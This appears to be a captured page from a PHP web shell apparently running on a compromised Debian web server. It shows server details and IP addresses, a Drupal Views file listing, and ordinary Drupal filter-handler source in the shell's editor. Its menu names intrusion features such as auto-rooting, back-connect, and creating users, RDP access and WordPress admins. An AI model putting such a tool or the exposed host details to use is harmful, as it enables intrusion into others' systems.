Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.189.180.236
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
handlers /
[ HOME SHELL ]
Name
Size
Permission
Action
views_handler_area.inc
3.27
KB
-rw-r--r--
views_handler_area_messages.in...
645
B
-rw-r--r--
views_handler_area_result.inc
3
KB
-rw-r--r--
views_handler_area_text.inc
3.69
KB
-rw-r--r--
views_handler_area_text_custom...
1.28
KB
-rw-r--r--
views_handler_area_view.inc
2.5
KB
-rw-r--r--
views_handler_argument.inc
41.86
KB
-rw-r--r--
views_handler_argument_date.in...
3.25
KB
-rw-r--r--
views_handler_argument_formula...
1.55
KB
-rw-r--r--
views_handler_argument_group_b...
716
B
-rw-r--r--
views_handler_argument_many_to...
5.42
KB
-rw-r--r--
views_handler_argument_null.in...
1.78
KB
-rw-r--r--
views_handler_argument_numeric...
3.4
KB
-rw-r--r--
views_handler_argument_string....
8.53
KB
-rw-r--r--
views_handler_field.inc
56.17
KB
-rw-r--r--
views_handler_field_boolean.in...
3.45
KB
-rw-r--r--
views_handler_field_contextual...
3.19
KB
-rw-r--r--
views_handler_field_counter.in...
2.03
KB
-rw-r--r--
views_handler_field_custom.inc
1.52
KB
-rw-r--r--
views_handler_field_date.inc
7.55
KB
-rw-r--r--
views_handler_field_entity.inc
3.09
KB
-rw-r--r--
views_handler_field_machine_na...
2.05
KB
-rw-r--r--
views_handler_field_markup.inc
1.44
KB
-rw-r--r--
views_handler_field_math.inc
2.88
KB
-rw-r--r--
views_handler_field_numeric.in...
5.06
KB
-rw-r--r--
views_handler_field_prerender_...
4.57
KB
-rw-r--r--
views_handler_field_serialized...
1.96
KB
-rw-r--r--
views_handler_field_time_inter...
943
B
-rw-r--r--
views_handler_field_url.inc
1.2
KB
-rw-r--r--
views_handler_filter.inc
50.22
KB
-rw-r--r--
views_handler_filter_boolean_o...
6.04
KB
-rw-r--r--
views_handler_filter_boolean_o...
910
B
-rw-r--r--
views_handler_filter_combine.i...
5.55
KB
-rw-r--r--
views_handler_filter_date.inc
6.4
KB
-rw-r--r--
views_handler_filter_entity_bu...
3.58
KB
-rw-r--r--
views_handler_filter_equality....
978
B
-rw-r--r--
views_handler_filter_fields_co...
3.55
KB
-rw-r--r--
views_handler_filter_group_by_...
1.77
KB
-rw-r--r--
views_handler_filter_in_operat...
13.4
KB
-rw-r--r--
views_handler_filter_many_to_o...
3.24
KB
-rw-r--r--
views_handler_filter_numeric.i...
9.28
KB
-rw-r--r--
views_handler_filter_string.in...
9.48
KB
-rw-r--r--
views_handler_relationship.inc
5.94
KB
-rw-r--r--
views_handler_relationship_gro...
15.71
KB
-rw-r--r--
views_handler_sort.inc
6.73
KB
-rw-r--r--
views_handler_sort_date.inc
2.27
KB
-rw-r--r--
views_handler_sort_group_by_nu...
886
B
-rw-r--r--
views_handler_sort_menu_hierar...
1.94
KB
-rw-r--r--
views_handler_sort_random.inc
402
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views_handler_filter_numeric.inc
<?php /** * @file * Definition of views_handler_filter_numeric. */ /** * Simple filter to handle greater than/less than filters * * @ingroup views_filter_handlers */ class views_handler_filter_numeric extends views_handler_filter { var $always_multiple = TRUE; function option_definition() { $options = parent::option_definition(); $options['value'] = array( 'contains' => array( 'min' => array('default' => ''), 'max' => array('default' => ''), 'value' => array('default' => ''), ), ); return $options; } function operators() { $operators = array( '<' => array( 'title' => t('Is less than'), 'method' => 'op_simple', 'short' => t('<'), 'values' => 1, ), '<=' => array( 'title' => t('Is less than or equal to'), 'method' => 'op_simple', 'short' => t('<='), 'values' => 1, ), '=' => array( 'title' => t('Is equal to'), 'method' => 'op_simple', 'short' => t('='), 'values' => 1, ), '!=' => array( 'title' => t('Is not equal to'), 'method' => 'op_simple', 'short' => t('!='), 'values' => 1, ), '>=' => array( 'title' => t('Is greater than or equal to'), 'method' => 'op_simple', 'short' => t('>='), 'values' => 1, ), '>' => array( 'title' => t('Is greater than'), 'method' => 'op_simple', 'short' => t('>'), 'values' => 1, ), 'between' => array( 'title' => t('Is between'), 'method' => 'op_between', 'short' => t('between'), 'values' => 2, ), 'not between' => array( 'title' => t('Is not between'), 'method' => 'op_between', 'short' => t('not between'), 'values' => 2, ), ); // if the definition allows for the empty operator, add it. if (!empty($this->definition['allow empty'])) { $operators += array( 'empty' => array( 'title' => t('Is empty (NULL)'), 'method' => 'op_empty', 'short' => t('empty'), 'values' => 0, ), 'not empty' => array( 'title' => t('Is not empty (NOT NULL)'), 'method' => 'op_empty', 'short' => t('not empty'), 'values' => 0, ), ); } // Add regexp support for MySQL. if (Database::getConnection()->databaseType() == 'mysql') { $operators += array( 'regular_expression' => array( 'title' => t('Regular expression'), 'short' => t('regex'), 'method' => 'op_regex', 'values' => 1, ), ); } return $operators; } /** * Provide a list of all the numeric operators */ function operator_options($which = 'title') { $options = array(); foreach ($this->operators() as $id => $info) { $options[$id] = $info[$which]; } return $options; } function operator_values($values = 1) { $options = array(); foreach ($this->operators() as $id => $info) { if ($info['values'] == $values) { $options[] = $id; } } return $options; } /** * Provide a simple textfield for equality */ function value_form(&$form, &$form_state) { $form['value']['#tree'] = TRUE; // We have to make some choices when creating this as an exposed // filter form. For example, if the operator is locked and thus // not rendered, we can't render dependencies; instead we only // render the form items we need. $which = 'all'; if (!empty($form['operator'])) { $source = ($form['operator']['#type'] == 'radios') ? 'radio:options[operator]' : 'edit-options-operator'; } if (!empty($form_state['exposed'])) { $identifier = $this->options['expose']['identifier']; if (empty($this->options['expose']['use_operator']) || empty($this->options['expose']['operator_id'])) { // exposed and locked. $which = in_array($this->operator, $this->operator_values(2)) ? 'minmax' : 'value'; } else { $source = 'edit-' . drupal_html_id($this->options['expose']['operator_id']); } } if ($which == 'all') { $form['value']['value'] = array( '#type' => 'textfield', '#title' => empty($form_state['exposed']) ? t('Value') : '', '#size' => 30, '#default_value' => $this->value['value'], '#dependency' => array($source => $this->operator_values(1)), ); if (!empty($form_state['exposed']) && !isset($form_state['input'][$identifier]['value'])) { $form_state['input'][$identifier]['value'] = $this->value['value']; } } elseif ($which == 'value') { // When exposed we drop the value-value and just do value if // the operator is locked. $form['value'] = array( '#type' => 'textfield', '#title' => empty($form_state['exposed']) ? t('Value') : '', '#size' => 30, '#default_value' => $this->value['value'], ); if (!empty($form_state['exposed']) && !isset($form_state['input'][$identifier])) { $form_state['input'][$identifier] = $this->value['value']; } } if ($which == 'all' || $which == 'minmax') { $form['value']['min'] = array( '#type' => 'textfield', '#title' => empty($form_state['exposed']) ? t('Min') : '', '#size' => 30, '#default_value' => $this->value['min'], ); $form['value']['max'] = array( '#type' => 'textfield', '#title' => empty($form_state['exposed']) ? t('And max') : t('And'), '#size' => 30, '#default_value' => $this->value['max'], ); if ($which == 'all') { $dependency = array( '#dependency' => array($source => $this->operator_values(2)), ); $form['value']['min'] += $dependency; $form['value']['max'] += $dependency; } if (!empty($form_state['exposed']) && !isset($form_state['input'][$identifier]['min'])) { $form_state['input'][$identifier]['min'] = $this->value['min']; } if (!empty($form_state['exposed']) && !isset($form_state['input'][$identifier]['max'])) { $form_state['input'][$identifier]['max'] = $this->value['max']; } if (!isset($form['value'])) { // Ensure there is something in the 'value'. $form['value'] = array( '#type' => 'value', '#value' => NULL ); } } } function query() { $this->ensure_my_table(); $field = "$this->table_alias.$this->real_field"; $info = $this->operators(); if (!empty($info[$this->operator]['method'])) { $this->{$info[$this->operator]['method']}($field); } } function op_between($field) { if ($this->operator == 'between') { $this->query->add_where($this->options['group'], $field, array($this->value['min'], $this->value['max']), 'BETWEEN'); } else { $this->query->add_where($this->options['group'], db_or()->condition($field, $this->value['min'], '<=')->condition($field, $this->value['max'], '>=')); } } function op_simple($field) { $this->query->add_where($this->options['group'], $field, $this->value['value'], $this->operator); } function op_empty($field) { if ($this->operator == 'empty') { $operator = "IS NULL"; } else { $operator = "IS NOT NULL"; } $this->query->add_where($this->options['group'], $field, NULL, $operator); } function op_regex($field) { $this->query->add_where($this->options['group'], $field, $this->value['value'], 'RLIKE'); } function admin_summary() { if ($this->is_a_group()) { return t('grouped'); } if (!empty($this->options['exposed'])) { return t('exposed'); } $options = $this->operator_options('short'); $output = check_plain($options[$this->operator]); if (in_array($this->operator, $this->operator_values(2))) { $output .= ' ' . t('@min and @max', array('@min' => $this->value['min'], '@max' => $this->value['max'])); } elseif (in_array($this->operator, $this->operator_values(1))) { $output .= ' ' . check_plain($this->value['value']); } return $output; } /** * Do some minor translation of the exposed input */ function accept_exposed_input($input) { if (empty($this->options['exposed'])) { return TRUE; } // rewrite the input value so that it's in the correct format so that // the parent gets the right data. if (!empty($this->options['expose']['identifier'])) { $value = &$input[$this->options['expose']['identifier']]; if (!is_array($value)) { $value = array( 'value' => $value, ); } } $rc = parent::accept_exposed_input($input); if (empty($this->options['expose']['required'])) { // We have to do some of our own checking for non-required filters. $info = $this->operators(); if (!empty($info[$this->operator]['values'])) { switch ($info[$this->operator]['values']) { case 1: if ($value['value'] === '') { return FALSE; } break; case 2: if ($value['min'] === '' && $value['max'] === '') { return FALSE; } break; } } } return $rc; } }
Close